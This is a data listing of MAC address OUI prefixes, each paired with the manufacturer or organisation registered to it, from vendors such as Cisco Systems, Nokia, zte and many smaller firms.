+6C8B2F zte +B863BC Robotis +C8DDC9 Lenovo Mobile Communication Technology +CC1AFA zte +8C5AF0 Exeltech Solar Products +F8DADF EcoTech +30AE7B Deqing Dusun Electron +1441E2 Monaco Enterprises +F07765 Sourcefire +E4F7A1 Datafox GmbH +601E02 EltexAlatau +E47D5A Beijing Hanbang Technology +4C6255 Sanmina-sci System DE Mexico S.A. DE C.V. +381766 Promzakaz +204C6D Hugo Brennenstuhl Gmbh & KG. +DC825B Janus, spol. s r.o. +B08807 Strata Worldwide +74D02B Asustek Computer +A4E0E6 Filizola S.A. Pesagem E Automacao +60E00E Shinsei Electronics +30D46A Autosales Incorporated +30AABD Shanghai Reallytek Information Technology +A4B818 Penta Gesellschaft Fr Elektronische Industriedatenverarbeitung mbH +106682 NEC Platforms +102831 Morion +D81EDE B&W Group +6897E8 Society of Motion Picture & Television Engineers +FC58FA Shen Zhen Shi Xin Zhong Xin Technology +60601F SZ DJI Technology +E0C6B3 MilDef AB +FCDB96 Enervalley +882E5A storONE +D429EA Zimory GmbH +C80E95 OmniLync +50ABBF Hoseo Telecom +C8EEA6 Shenzhen SHX Technology +28CBEB One +18E8DD Moduletek +4CCC34 Motorola Solutions +F084C9 zte +E894F6 TP-Link Technologies +94ACCA trivum technologies GmbH +7CD844 Enmotus +F4C6D7 blackned GmbH +4CCA53 Skyera +081DFB Shanghai Mexon Communication Technology +D0CDE1 Scientech Electronics +94756E QinetiQ North America +0C5521 Axiros GmbH +A4D856 Gimbal +10A743 SK Mtek Limited +E4A7FD Cellco Partnership +24F2DD Radiant Zemax +80CF41 Lenovo Mobile Communication Technology +7C9A9B VSE valencia smart energy +A845E9 Firich Enterprises +78995C Nationz Technologies +8CC5E1 ShenZhen Konka Telecommunication Technology +6CB311 Shenzhen Lianrui Electronics +54115F Atamo +2411D0 Chongqing Ehs Science and Technology Development +6C9AC9 Valentine Research +10F49A T3 Innovation +5865E6 Infomark +60BD91 Move Innovation +98473C Shanghai Sunmon Communication Technogy +CC4BFB Hellberg Safety AB +ACA22C Baycity Technologies +6CADEF KZ Broadband Technologies +044BFF GuangZhou Hedy Digital Technology +949BFD Trans New Technology +E4EEFD MR&D Manufacturing +105CBF DuroByte +EC89F5 Lenovo Mobile Communication Technology +083AB8 Shinoda Plasma +A0DD97 PolarLink Technologies +E05597 Emergent Vision Technologies +A01917 Bertel +FC9FAE Fidus Systems +FC0647 Cortland Research +20918A Profalux +7C438F E-Band Communications +FC626E Beijing MDC Telecom +C0B339 Comigo +DCC0DB Shenzhen Kaiboer Technology +7076DD Oxyguard International A/S +E89AFF Fujian Landi Commercial Equipment +683B1E Countwise +D4136F Asia Pacific Brands +A0A130 DLI Taiwan Branch office +ECE915 STI +A81FAF Krypton Polska +087BAA Svyazkomplektservice +2C26C5 zte +BC629F Telenet Systems P. +B47F5E Foresight Manufacture (S) Pte +785517 SankyuElectronics +848E96 Embertec +CC3A61 Samsung Electro Mechanics +A00363 Robert Bosch Healthcare GmbH +F0F644 Whitesky Science & Technology +30D357 Logosol +2C441B Spectrum Medical Limited +1C5A6B Philips Electronics Nederland BV +A875D6 FreeTek International +58EB14 Proteus Digital Health +789F87 Siemens AG I IA PP PRM +7C0A50 J-MEX +40F2E9 IBM +9C0473 Tecmobile (International) +CC262D Verifi +3C8AE5 Tensun Information Technology(Hangzhou) +7CB232 Hui Zhou Gaoshengda Technology +54DF63 Intrakey technologies GmbH +7C0187 Curtis Instruments +388EE7 Fanhattan +54F666 Berthold Technologies GmbH andKG +802FDE Zurich Instruments AG +08AF78 Totus Solutions +5C38E0 Shanghai Super Electronics Technology +A0E534 Stratec Biomedical AG +2891D0 Stage Tec Entwicklungsgesellschaft fr professionelle Audiotechnik mbH +98291D Jaguar de Mexico, SA de CV +18863A Digital ART System +F4B72A Time Interconnect +34D7B4 Tributary Systems +F40F9B Wavelink +144319 Creative&Link Technology Limited +64F50E Kinion Technology Company Limited +28A186 enblink +1C9492 Ruag Schweiz AG +24694A Jasmine Systems +C8C791 Zero1.tv GmbH +60748D Atmaca Elektronik +78D129 Vicos +78AB60 ABB Australia +289A4B SteelSeries ApS +0CC66A Nokia +3078C2 Innowireless +7CFE28 Salutron +109FA9 Actiontec Electronics +C0A364 3D Systems Massachusetts +98A7B0 Mcst ZAO +88DC96 Senao Networks +C455C2 Bach-Simpson +ECA29B Kemppi Oy +04CE14 Wilocity +802AFA Germaneers GmbH +1C8464 Formosa Wireless Communication +D867D9 Cisco Systems +B4218A Dog Hunter +F8A03D Dinstar Technologies +D08CFF Upwis AB +9C066E Hytera Communications Limited +746A89 Rezolt +68D1FD Shenzhen Trimax Technology +241B13 Shanghai Nutshell Electronic +B43564 Fujian Tian Cheng Electron Science & Technical Development +54D1B0 Universal Laser Systems +A497BB Hitachi Industrial Equipment Systems +FC52CE Control iD +E804F3 Throughtek +B85810 Numera +9886B1 Flyaudio (China) +28B3AB Genmark Automation +44E8A5 Myreka Technologies Sdn. Bhd. +AC14D2 wi-daq +9C4CAE Mesa Labs +7CD9FE New Cosmos Electric +E49069 Rockwell Automation +B48910 Coster T.E. +A4B1E9 Technicolor +30AEF6 Radio Mobile Access +58343B Glovast Technology +54A04F t-mac Technologies +E44F5F EDS Elektronik Destek San.Tic.Ltd.Sti +08B738 Lite-On Technogy +9C6650 Glodio Technolies,Ltd Tianjin Branch +503955 Cisco Spvtg +90CF6F Dlogixs +68AF13 Futura Mobility +B82410 Magneti Marelli Slovakia s.r.o. +A8EF26 Tritonwave +F0D3E7 Sensometrix SA +7CC8D0 Tianjin Yaan Technology +88E917 Tamaggo +80AAA4 Usag +5C2479 Baltech AG +E8CBA1 Nokia +F85F2A Nokia +286094 Capelec +60E956 Ayla Networks +287184 Spire Payments +1CB094 HTC +FC5090 Simex Sp. z o.o. +209BA5 Jiaxing Glead Electronics +60843B Soladigm +508C77 Dirmeier Schanktechnik Gmbh &Co KG +6089B1 Key Digital Systems +080CC9 Mission Technology Group, dba Magma +A0F450 HTC +44D15E Shanghai Kingto Information Technology +545EBD NL Technologies +C8BBD3 Embrane +ECD19A Zhuhai Liming Industries +346E8A Ecosense +ACEE3B 6harmonics +681605 Systems And Electronic Development Fzco +04F17D Tarana Wireless +A0DC04 Becker-Antriebe GmbH +2CBE97 Ingenieurbuero Bickele und Buehler GmbH +045A95 Nokia +B40E96 Heran +0CAF5A Genus Power Infrastructures Limited +D0699E Luminex Lighting Control Equipment +64AE88 Polytec GmbH +2C542D Cisco Systems +709E86 X6D Limited +946124 Pason Systems +DC309C Heyrex Limited +E81324 GuangZhou Bonsoninfo System +0036F8 Conti Temic microelectronic GmbH +443839 Cumulus Networks +20F002 MTData Developments +CC912B TE Connectivity Touch Solutions +785262 Shenzhen Hojy Software +40336C Godrej & Boyce Mfg. +FC1D59 I Smart Cities HK +EC0ED6 Itech Instruments SAS +D0D212 K2NET +9C8EDC Teracom Limited +146A0B Cypress Electronics Limited +B0750C QA Cafe +B4E1EB Private +FC2A54 Connected Data +A090DE Veedims +AC1461 Ataw +508A42 Uptmate Technology +8C57FD LVX Western +002A6A Cisco Systems +B88F14 Analytica GmbH +94FAE8 Shenzhen Eycom Technology +3CA315 Bless Information & Communications +F8DB4C PNY Technologies +F83094 Alcatel-Lucent Telecom Limited +2817CE Omnisense +28E608 Tokheim +E477D4 Minrray Industry +A4B980 Parking Boxx +002D76 Titech Gmbh +78A183 Advidia +F85063 Verathon +400E67 Tremol +901B0E Fujitsu Technology Solutions GmbH +5C6F4F S.A. Sistel +B058C4 Broadcast Microwave Services +B820E7 Guangzhou Horizontal Information & Network Integration +98588A Sysgration +842B50 Huria +0C5A19 Axtion Sdn Bhd +A00CA1 Sktb Skit +E09579 Orthosoft, D/b/a Zimmer CAS +307ECB SFR +90A783 JSW Pacific +000830 Cisco Systems +CCEF48 Cisco Systems +78A5DD Shenzhen Smarteye Digital Electronics +28B0CC Xenya d.o.o. +ECE744 Omntec mfg. +80427C Adolf Tedsen GmbH & KG +F8F7D3 International Communications +B89AED OceanServer Technology +E455EA Dedicated Computing +00FC58 WebSilicon +64A0E7 Cisco Systems +18E80F Viking Electronics +EC6264 Global411 Internet Services +00F051 KWB Gmbh +F0DEB9 ShangHai Y&Y Electronics +AC54EC Ieee P1823 Standards Working Group +C8292A Barun Electronics +E0DADC JVC Kenwood +C894D2 Jiangsu Datang Electronic Products +A0423F Tyan Computer +5C18B5 Talon Communications +78BAD0 Shinybow Technology +306CBE Skymotion Technology (HK) Limited +40D559 Micro S.e.r.i. +F82F5B eGauge Systems +3499D7 Universal Flow Monitors +7C336E MEG Electronics +D4D249 Power Ethernet +10C2BA UTT +F0DA7C RLH Industries +40984C Casacom Solutions AG +B8975A Biostar Microtech Int'l +4833DD Zennio Avance Y Tecnologia +D4D748 Cisco Systems +9CCAD9 Nokia +F8313E endeavour GmbH +10FC54 Shany Electronic +D4CA6D Routerboard.com +D8E743 Wush +908FCF UNO System +903CAE Yunnan Ksec Digital Technology +000831 Cisco Systems +F0620D Shenzhen Egreat Tech +843611 hyungseul publishing networks +B8FD32 Zhejiang Roicx Microelectronics +D8052E Skyviia +F83553 Magenta Research +DC3C2E Manufacturing System Insights +40BC8B itelio GmbH +88C36E Beijing Ereneben lnformation Technology Limited +8CDE52 Issc Technologies +A8776F Zonoff +902B34 Giga-byte Technology +48E1AF Vity +C0A0DE Multi Touch Oy +943AF0 Nokia +B826D4 Furukawa Industrial S.A. Produtos Eltricos +14E4EC mLogic +AC0DFE Ekon GmbH - myGEKKO +005CB1 Gospell Digital Technology +186751 Komeg Industrielle Messtechnik Gmbh +B467E9 Qingdao GoerTek Technology +B49EE6 Shenzhen Technology +7041B7 Edwards Lifesciences +A849A5 Lisantech +94DB49 Sitcorp +8CD17B CG Mobile +144978 Digital Control Incorporated +FC8FC4 Intelligent Technology +F04A2B Pyramid Computer Gmbh +CC9093 Hansong Tehnologies +78F7D0 Silverbrook Research +F04B6A Scientific Production Association Siberian Arsenal +30DE86 Cedac Software S.r.l. +F013C3 Shenzhen Fenda Technology +CCE7DF American Magnetics +E44E18 Gardasoft VisionLimited +D41C1C RCF +8C94CF Encell Technology +149090 KongTop industrial(shen zhen)CO. +CCF8F0 Xi'an Hisu Multimedia Technology +30F9ED Sony +28C718 Altierre +2046A1 Vecow +8C271D QuantHouse +9C8BF1 The Warehouse Limited +147DC5 Murata Manufacturing +944696 BaudTec +90342B Gatekeeper Systems +D45251 IBT Ingenieurbureau Broennimann Thun +3071B2 Hangzhou Prevail Optoelectronic Equipment +B82ADC EFR Europische Funk-Rundsteuerung GmbH +B09BD4 GNH Software India Private Limited +7CF429 Nuuo +B8CDA7 Maxeler Technologies +F49461 NexGen Storage +804731 Packet Design +ACCB09 Hefcom Metering (Pty) +10EED9 Canoga Perkins +240BB1 Kostal Industrie Elektrik Gmbh +20EEC6 Elefirst Science & Tech +807A7F ABB Genway Xiamen Electrical Equipment +14373B Procom Systems +B81999 Nesys +4C5585 Hamilton Systems +8CCF5C Befega Gmbh +A0133B HiTi Digital +448E12 DT Research +9C5711 Feitian Xunda(Beijing) Aeronautical Information Technology +18AD4D Polostar Technology +4CA74B Alcatel Lucent +549478 Silvershore Technology Partners +F4B164 Lightning Telecommunications Technology +0CFC83 Airoha Technology +0C51F7 Chauvin Arnoux +70B035 Shenzhen Zowee Technology +708105 Cisco Systems +00082F Cisco Systems +542018 Tely Labs +581FEF Tuttnaer +F8F25A G-Lab GmbH +BC779F SBM +C058A7 Pico Systems +04D783 Y&H E&C +00E175 AK-Systems +843F4E Tri-Tech Manufacturing +C83232 Hunting Innova +D059C3 CeraMicro Technology +EC9681 2276427 Ontario +B8288B Parker Hannifin Manufacturing (UK) +5835D9 Cisco Systems +802E14 azeti Networks AG +E8944C Cogent Healthcare Systems +68F895 Redflow Limited +A88792 Broadband Antenna Tracking Systems +901900 SCS SA +AC932F Nokia +1435B3 Future Designs +FCF1CD Optex-fa +B03829 Siliconware Precision Industries +BC0F2B Fortune Techgroup +8CF9C9 Mesada Technology +E42AD3 Magneti Marelli S.p.A. Powertrain +FC10BD Control Sistematizado +443719 2 Save Energy +E83EB6 RIM +94FD1D WhereWhen +0CE82F Bonfiglioli Vectron GmbH +C0626B Cisco Systems +B4B88D Thuh Company +60F59C CRU-Dataport +4C73A5 Kove +F86971 Seibu Electric +44AA27 udworks +6CAD3F Hubbell Building Automation +8427CE Corporation of the Presiding Bishop of The Church of Jesus Christ of Latter-day Saints +D428B2 ioBridge +90B8D0 Joyent +909060 RSI Video Technologies +281471 Lantis +1407E0 Abrantix AG +DCCF94 Beijing Rongcheng Hutong Technology +18E288 STT Condigi +68876B INQ Mobile Limited +9866EA Industrial Control Communications +F4A52A Hawa Technologies +90CF15 Nokia +B8D49D M Seven System +B0A10A Pivotal Systems +48F47D TechVision Holding Internation Limited +6C391D Beijing ZhongHuaHun Network Information center +64D241 Keith & Koep GmbH +101212 Vivo International +5087B8 Nuvyyo +E41289 topsystem Systemhaus GmbH +A4134E Luxul +B09928 Fujitsu Limited +8C11CB Abus Security-center Gmbh & KG +806459 Nimbus +A45A1C smart-electronic GmbH +8C89A5 Micro-Star INT'L +3C672C Sciovid +18D071 Dasan +38D135 EasyIO Sdn. Bhd. +184E94 Messoa Technologies +94D93C Enelps +DC9B1E Intercom +5C7757 Haivision Network Video +E8B4AE Shenzhen C&D Electronics +C45600 Galleon Embedded Computing +E42FF6 Unicore communication +B8F4D0 Herrmann Ultraschalltechnik GmbH & Kg +B4F323 Petatel +C81E8E ADV Security (S) Pte +ACCABA Midokura +9C417C Hame Technology, Limited +10768A EoCell +044665 Murata Manufacturing +D0131E Sunrex Technology +380197 Tsst Global +B40142 GCI Science & Technology +846EB1 Park Assist +6C504D Cisco Systems +C0C1C0 Cisco-Linksys +1CBD0E Amplified Engineering +F0A764 GST +A0F217 GE Medical System(China) +643409 BITwave Pte +20D5AB Korea Infocom +F05849 CareView Communications +BC15A6 Taiwan Jantek Electronics +241A8C Squarehead Technology AS +1083D2 Microseven Systems +F05D89 Dycon Limited +AC02CF RW Tecnologia Industria e Comercio Ltda +9067B5 Alcatel-Lucent +40987B Aisino +6C2E33 Accelink Technologies +4CEDDE Askey Computer +E8E08F Gravotech Marking SAS +78B6C1 Aobo Telecom +B8BA68 Xi'an Jizhong Digital Communication +BC38D2 Pandachip Limited +14EE9D AirNav Systems +48174C MicroPower technologies +F81037 Atopia Systems +64F987 Avvasi +3C7437 RIM +64DC01 Static Systems Group PLC +1CF5E7 Turtle Industry +2C8065 Harting of North America +F8F014 RackWare +E41C4B V2 Technology +E0143E Modoosis +204AAA Hanscan Spain +F02572 Cisco Systems +8091C0 AgileMesh +0CF0B4 Globalsat International Technology +BCC61A Spectra Embedded Systems +48DF1C Wuhan NEC Fibre Optic Communications industry +D0D3FC Mios +989449 Skyworth Wireless Technology +C8DF7C Nokia +F8C678 Carefusion +FC3598 Favite +A0AAFD EraThink Technologies +E03E7D data-complex GmbH +A4E32E Silicon & Software Systems +1C19DE eyevis GmbH +DC07C1 HangZhou QiYang Technology +D8FE8F IDFone +0006F6 Cisco Systems +ACAB8D Lyngso Marine A/S +E8995A PiiGAB, Processinformation i Goteborg AB +D4E32C S. Siedle & Sohne +68DCE8 PacketStorm Communications +78223D Affirmed Networks +60C980 Trymus +94CDAC Creowave Oy +F4DCDA Zhuhai Jiahe Communication Technology, limited +100D32 Embedian +D82986 Best Wish Technology +C03B8F Minicom Digital Signage +A4218A Nortel Networks +6C0460 RBH Access Technologies +5C864A Secret Labs +B8BA72 Cynove +C00D7E Additech +68784C Nortel Networks +6C626D Micro-Star INT'L +8841C1 Orbisat DA Amazonia IND E Aerol SA +18B209 Torrey Pines Logic +3018CF Deos Control Systems Gmbh +4CF737 SamJi Electronics +40406B Icomera +1880CE Barberry Solutions +CC43E3 Trump +6C22AB Ainsworth Game Technology +3C106F Albahith Technologies +7CE044 Neon +64D02D Next Generation Integration (NGI) +A04041 Samwonfa +788C54 Eltek Technologies +9411DA ITF Frschl GmbH +10E8EE PhaseSpace +A47C1F Cobham plc +8C1F94 RF Surgical System +74A4A7 QRS Music Technologies +8039E5 Patlite +BCFFAC Topcon +602A54 CardioTek +1C3DE7 Sigma Koki +482CEA Motorola Business Light Radios +70E139 3view +AC6123 Drivven +3C04BF Pravis Systemsltd. +443D21 Nuvolt +749050 Renesas Electronics +7CBB6F Cosco Electronics +D466A8 Riedo Networks GmbH +98E165 Accutome +EC66D1 B&W Group +385FC3 Yu Jeong System,Ltd +94857A Evantage Industries +4451DB Raytheon BBN Technologies +64995D LGE +585076 Linear Equipamentos Eletronicos SA +4083DE Zebra Technologies +8897DF Entrypass Sdn. Bhd. +0C15C5 Sdtec +9803A0 ABB n.v. Power Quality Products +DCFAD5 Strong Ges.m.b.h. +D84606 Silicon Valley Global Marketing +D0E347 Yoga +84A991 Cyber Trans Japan +D81C14 Compacta International +9088A2 Ionics Technology ME Ltda +B0B8D5 Nanjing Nengrui Auto Equipment +8497B8 Memjet +A8556A Pocketnet Technology +B081D8 I-sys +206AFF Atlas Elektronik UK Limited +EC542E Shanghai XiMei Electronic Technology +B88E3A Infinite Technologies JLT +74BE08 Atek Products +E0EE1B Panasonic Automotive Systems Company of America +E80C38 Daeyoung Information System +68597F Alcatel Lucent +2C3068 Pantech +5C4058 Jefferson Audio Video Systems +64317E Dexin +AC9B84 Smak Tecnologia e Automacao +4C022E CMR Korea +24A42C Koukaam a.s. +34F39B WizLAN +74B9EB JinQianMao Technology +244597 Gemue Gebr. Mueller Apparatebau +30694B RIM +AC5135 MPI Tech +00D38D Hotel Technology Next Generation +3C6278 Shenzhen Jetnet Technology +8081A5 Tongqing Communication Equipment (shenzhen) +EC8EAD DLX +ECDE3D Lamprey Networks +04FE7F Cisco Systems +E8056D Nortel Networks +00D11C Acetel +1056CA Peplink International +44A689 Promax Electronica SA +10CCDB Aximum Produits Electroniques +6C92BF Inspur Electronic Information Industry +E01CEE Bravo Tech +3C1915 GFI Chrono Time +EC5C69 Mitsubishi Heavy Industries Mechatronics Systems +04E548 Cohda Wireless +0C1DC2 SeAH Networks +28CD4C Individual Computers GmbH +8C53F7 A&D Engineering +781185 NBS Payment Solutions +2893FE Cisco Systems +10B7F6 Plastoform Industries +2059A0 Paragon Technologies +487119 SGB Group +E0ABFE Orb Networks +CCEA1C Dconworks +ACE348 MadgeTech +687F74 Cisco-Linksys +CCB888 AnB Securite +CC2218 InnoDigital +B86491 CK Telecom +80C862 Openpeak +E43593 Hangzhou GoTo technologyLtd +E0BC43 C2 Microsystems +7884EE Indra Espacio +2C3F3E Alge-Timing GmbH +C0CFA3 Creative Electronics & Software +D4823E Argosy Technologies +844823 Woxter Technology +D0F0DB Ericsson +7C1476 Damall Technologies SAS +D05875 Active Control Technology +D81BFE Twinlinx +D46CBF Goodrich ISR +5C57C8 Nokia +4CC602 Radios +3C05AB Product Creation Studio +3C39C3 JW Electronics +547FEE Cisco Systems +A4C2AB Hangzhou Lead-it Information & Technology +48AA5D Store Electronic Systems +1062C9 Adatis GmbH & KG +D8AE90 Itibia Technologies +904716 Rorze +28E794 Microtime Computer +8894F9 Gemicom Technology +0CA42A OB Telecom Electronic Technology +5850E6 Best Buy +AC9A96 Lantiq Deutschland GmbH +E86CDA Supercomputers and Neurocomputers Research Center +24B6B8 Friem SPA +F86ECF Arcx +8C8401 Private +6C7039 Novar GmbH +A4561B Mcot +80EE73 Shuttle +10C73F Midas Klark Teknik +408A9A Titeng +702B1D E-Domus International Limited +F077D0 Xcellen +785C72 Hioso Technology +94236E Shenzhen Junlan Electronic +88BA7F Qfiednet +E02636 Nortel Networks +4456B7 Spawn Labs +A09805 OpenVox Communication +00271D Comba Telecom Systems (China) +002721 Shenzhen Baoan Fenda Industrial +A09A5A Time Domain +64A837 Juni Korea +B4B5AF Minsung Electronics +44568D PNC Technologies +ACD180 Crexendo Business Solutions +AC8317 Shenzhen Furtunetel Communication +E80B13 Akib Systems Taiwan +44C9A2 Greenwald Industries +646E6C Radio Datacom +E4751E Getinge Sterilization AB +F8811A Overkiz +042BBB PicoCELA +FC0877 Prentke Romich Company +ECD00E MiraeRecognition +747E1A Red Embedded Design Limited +C47D4F Cisco Systems +4C9EE4 Hanyang Navicom +3CDF1E Cisco Systems +BCB181 Sharp +78B81A Inter Sales A/S +78192E Nascent Technology +2C0623 Win Leader +C82E94 Halfa Enterprise +0C2755 Valuable Techologies Limited +C038F9 Nokia Danmark A/S +F46349 Diffon +5C8778 Cybertelbridge +9C5E73 Calibre UK +F06281 ProCurve Networking by HP +003A9B Cisco Systems +2C9127 Eintechno +C09C92 Coby +849000 Arnold & Richter Cine Technik +C87248 Aplicom Oy +74D850 Evrisko Systems +6CAC60 Venetex +DC0265 Meditech Kft +68A1B7 Honghao Mingchuan Technology (Beijing) +7CCFCF Shanghai Seari Intelligent System +EC3091 Cisco Systems +3032D4 Hanilstm +0026EE TKM GmbH +0026E7 Shanghai Onlan Communication Tech. +0026E1 Stanford University, OpenFlow Group +0026DB Ionics EMS +0026CE Kozumi USA +0026D5 Ory Solucoes em Comercio de Informatica Ltda. +0026C8 System Sensor +002711 LanPro +00270D Cisco Systems +002707 Lift Complex DS +002700 Shenzhen Siglent Technology +0026FA BandRich +0026F4 Nesslab +0025D7 Cedo +0025D2 InpegVision +0025D1 Eastern Asia Technology Limited +0025CB Reiner SCT +0025BF Wireless Cables +0025B1 Maya-Creation +0025B8 Agile Communications +0025B2 Mbda Deutschland Gmbh +0025AC I-Tech +0026C2 Scdi +0026BC General Jack Technology +0026B4 Ford Motor Company +0026AE Wireless Measurement +0026AA Kenmec Mechanical Engineering +0026A4 Novus Produtos Eletronicos Ltda +002698 Cisco Systems +00269D M2Mnet +00268B Guangzhou Escene Computer Technology Limited +002685 Digital Innovation +002678 Logic Instrument SA +002672 Aamp of America +00266B Shine Union Enterprise Limited +002666 EFM Networks +002665 ProtectedLogic +002651 Cisco Systems +002652 Cisco Systems +002646 Shenyang Tongfang Multimedia Technology Company Limited +002640 Baustem Broadband Technologies +00263A Digitec Systems +002634 Infineta Systems +002633 MIR - Medical International Research +00262E Chengdu Jiuzhou Electronic Technology +002627 Truesell +002621 InteliCloud Technology +00261B Laurel Bank Machines +002614 Ktnf +00260E Ablaze Systems +002602 Smart Temps +002601 Cutera +0025F7 Ansaldo STS USA +0025FC Enda Endustriyel Elektronik STI. +0025ED NuVo Technologies +0025EE Avtex +0025E8 Idaho Technology +0025E3 Hanshinit +0025DE Probits +002579 J & F Labs +00257E NEW POS Technology Limited +002572 Nemo-Q International AB +00256B Atenix E.E. S.r.l. +00256C Azimut Production Association JSC +00255F SenTec AG +00255A Tantalus Systems +002559 Syphan Technologies +0025A5 Walnut Media Network +00259F TechnoDigital Technologies GmbH +002599 Hedon e.d. +002592 Guangzhou Shirui Electronic +00258D Haier +002588 Genie Industries +002583 Cisco Systems +00254C Videon Central +002536 Oki Electric Industry +00253D DRS Consolidated Controls +002540 Quasar Technologies +002533 Wittenstein AG +00252C Entourage Systems +002502 NaturalPoint +0024FB Private +0024F6 Miyoshi Electronics +0024EA iris-GmbH infrared & intelligent sensors +0024E3 CAO Group +002527 Bitrode +002524 Lightcomm Technology +00251F Zynus Vision +00251A Psiber Data Systems +002515 SFR +00250E gt german telematics gmbh +002507 Astak +002509 Sharetronic Group +002437 Motorola - BSG +00243C S.a.a.a. +002430 Ruby Tech +0023FB IP Datatel +0023F3 Glocom +0023EF Zuend Systemtechnik AG +0023E9 F5 Networks +0023E3 Microtronic AG +0023E2 SEA Signalisation +0023DD Elgin +0023D0 Uniloc USA +0023CA Behind The Set +0024B0 Esab AB +0024A9 Ag Leader Technology +0024A2 Hong Kong Middleware Technology Limited +0024A4 Siklu Communication +00249D NES Technology +00248A Kaga Electronics +00248F Do-monix +002496 Ginzinger electronic systems +002477 Tibbo Technology +002470 Aurotech Ultrasound AS. +002472 ReDriven Power +00246B Covia +002464 Bridge Technologies AS +00245F Vine Telecom +002420 NetUP +002426 Nohmi Bosai +00241A Red Beetle +002413 Cisco Systems +00240D OnePath Networks +00240E Inventec Besta +002407 Telem SAS +002400 Nortel Networks +0024D0 Shenzhen Sogood Industry +0024D5 Winward Industrial Limited +0024C9 Broadband Solutions Group +0024C4 Cisco Systems +0024BF Ciat +0024B5 Nortel Networks +00245A Nanjing Panda Electronics Company Limited +002453 Initra d.o.o. +00244D Hokkaido Electronics +002452 Silicon Software GmbH +002446 MMB Research +002441 Wanzl Metallwarenfabrik GmbH +002368 Zebra Technologies +00236F DAQ System +002362 Goldline Controls +002361 Unigen +00235C Aprius +002355 Kinco Automation(Shanghai) +00234F Luminous Power Technologies Pvt. +002350 LynTec +002349 Helmholtz Centre Berlin for Material and Energy +002244 Chengdu Linkon Communications Device +00224F Byzoro Networks +002248 Microsoft +00223E IRTrans GmbH +002239 Indiana Life Sciences Incorporated +002232 Design Design Technology +00222C Ceton +00230E Gorba AG +002307 Future Innovation Tech +002302 Cobalt Digital +0022EB Data Respons A/S +0022EC Idealbt Technology +0022F1 Private +00239E Jiangsu Lemote Technology Limited +002398 Vutlan sro +002384 GGH Engineering s.r.l. +002342 Coffee Equipment Company +002336 Metel S.r.o. +00233D Novero holding +002330 Dizipia +00232C Senticare +002320 Nicira Networks +00231D Deltacom Electronics +00231E Cezzer Multimedia Technologies +0022B8 Norcott +0022B7 GSS Grundig SAT-Systems GmbH +0022B2 4RF Communications +0022AB Shenzhen Turbosight Technology +0022A6 Sony Computer Entertainment America +00229F Sensys Traffic AB +0022E5 Fisher-Rosemount Systems +0022DE Oppo Digital +0022D9 Fortex Industrial +0022D2 All Earth Comrcio de Eletrnicos LTDA. +0022CC SciLog +0022C8 Applied Instruments +0022BE Cisco Systems +00228C Photon Europe GmbH +002286 Astron +002285 Nomus Comm Systems +002280 A2B Electronics AB +002276 Triple EYE +00227B Apogee Labs +002262 BEP Marine +00226C LinkSprite Technologies +00225E Uwin Technologies +002258 Taiyo Yuden +0023C3 LogMeIn +0023BD Digital Ally +0023B7 Q-Light +0023B1 Longcheer Technology (Singapore) Pte +0023B0 Comxion Technology +0023AB Cisco Systems +0023A4 New Concepts Development +001FC0 Control Express Finland Oy +001FBB Xenatech +001FB4 SmartShare Systems +001FAD Brown Innovations +001FAF NextIO +001FAE Blick South Africa (Pty) +001FA8 Smart Energy Instruments +001FA3 T&W Electronics(Shenzhen)Co. +002142 Advanced Control Systems doo +002140 EN Technologies +002138 Cepheid +00212E dresden-elektronik +002128 Oracle +002122 Chip-pro +00211B Cisco Systems +002115 Phywe Systeme Gmbh & KG +002116 Transcon Electronic Systems, spol. s r. o. +00210F Cernium +00210B Gemini Traze Rfid PVT. +00210C Cymtec Systems +001FFC Riccius+Sohn GmbH +001FF7 Nakajima All Precision +00216E Function ATI (Huizhou) Telecommunications +002168 iVeia +002161 Yournet +002155 Cisco Systems +00214E GS Yuasa Power Supply +002149 China Daheng Group +001FF0 Audio Partnership +001FE9 Printrex +001FEB Trio Datacom +001FEA Applied Media Technologies +001FDD GDI +001FD8 A-trust Computer +001FD3 Riva Networks +001FCE Qtech +00219D Adesys BV +0021A1 Cisco Systems +002198 Thai Radio +002193 Videofon MV +00218D AP Router Ind. Eletronica Ltda +00218E Mekics +002187 Imacs GmbH +002181 Si2 Microsystems Limited +00217B Bastec AB +002174 AvaLAN Wireless +0021F8 Enseo +0021F3 Si14 SpA +0021EC Solutronic GmbH +0021E6 Starlight Video Limited +0021E0 CommAgility +0021D3 Bocom Security(asia Pacific) Limited +0021D4 Vollmer Werke GmbH +0021D9 Sekonic +0021CD LiveTV +0021C7 Russound +0021C6 CSJ Global +0021C1 ABB Oy / Medium Voltage Products +0021B4 Apro Media +0021AE Alcatel-lucent France - WTD +0021A2 EKE-Electronics +0021A7 Hantle System +00221F eSang Technologies +002226 Avaak +00221A Audio Precision +002213 PCI +00220D Cisco Systems +00220C Cisco Systems +002202 Excito Elektronik i Skne AB +0021F9 Wirecom Technologies +001F40 Speakercraft +001F38 Positron +001F3D Qbit GmbH +001F37 Genesis I&C +001F2A Accm +001F31 Radiocomp +001F25 MBS GmbH +001F1E Astec Technology +001F17 IDX Company +001F18 Hakusan.Mfg.Co +001E61 Itec Gmbh +001E5C RB GeneralEkonomik +001E5B Unitron Company +001E55 Cowon Systems +001E4E Dako Edv-ingenieur- und Systemhaus Gmbh +001E49 Cisco Systems +001E44 Santec +001E3F TrellisWare Technologies +001E38 Bluecard Software Technology +001E31 Infomark +001E32 Zensys +001E2C CyVerse +001E20 Intertain +001E19 Gtri +001E0F Briot International +001EE4 ACS Solutions France +001EEB Talk-A-Phone +001EDF Master Industrialization Center Kista +001EDA Wesemann Elektrotechniek +001ED5 Tekon-Automatics +001ECE Bisa Technologies (hong Kong) Limited +001EC8 Rapid Mobile (Pty) +001EBB Bluelight Technology +001EB6 TAG Heuer SA +001EB5 Ever Sparkle Technologies +001EAF Ophir Optronics +001EAA E-Senza Technologies GmbH +001E9D Recall Technologies +001E98 GreenLine Communications +001E97 Medium Link System Technology +001E91 Kimin Electronic +001E8A eCopy +001E85 Lagotek +001E78 Owitek Technology +001E6D IT R&D Center +001E6E Shenzhen First Mile Communications +001F71 xG Technology +001F72 QingDao Hiphone Technology +001F76 AirLogic Systems +001F6C Cisco Systems +001F60 Compass Systems +001F65 Korea Electric Terminal +001F5F Blatand GmbH +001F59 Kronback Tracers +001F4D Segnetics +001F52 UVT Unternehmensberatung fur Verkehr und Technik GmbH +001F03 NUM AG +001EFE Level S.r.o. +001F04 Granch +001EF2 Micro Motion +001EF7 Cisco Systems +001EF1 Servimat +001F9E Cisco Systems +001F97 Bertana srl +001F8B Cache IQ +001F84 Gigle Semiconductor +001F7F Phabrix 